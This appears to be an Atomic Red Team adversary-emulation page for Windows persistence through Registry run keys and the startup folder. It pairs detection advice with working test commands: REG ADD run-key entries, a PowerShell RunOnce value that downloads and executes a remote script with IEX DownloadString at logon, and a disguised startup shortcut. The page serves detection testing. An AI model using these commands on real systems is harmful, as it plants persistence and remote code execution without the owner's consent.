Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Platforms: Windows
Data Sources: Windows Registry, File monitoring
Permissions Required: User, Administrator
Run Key Persistence
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe |
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
RunOnce Key Persistence
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
RunOnce Key Persistence via PowerShell
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| thing_to_execute | Thing to Run | Path | powershell.exe |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Add Shortcut To Startup via PowerShell
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe |
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()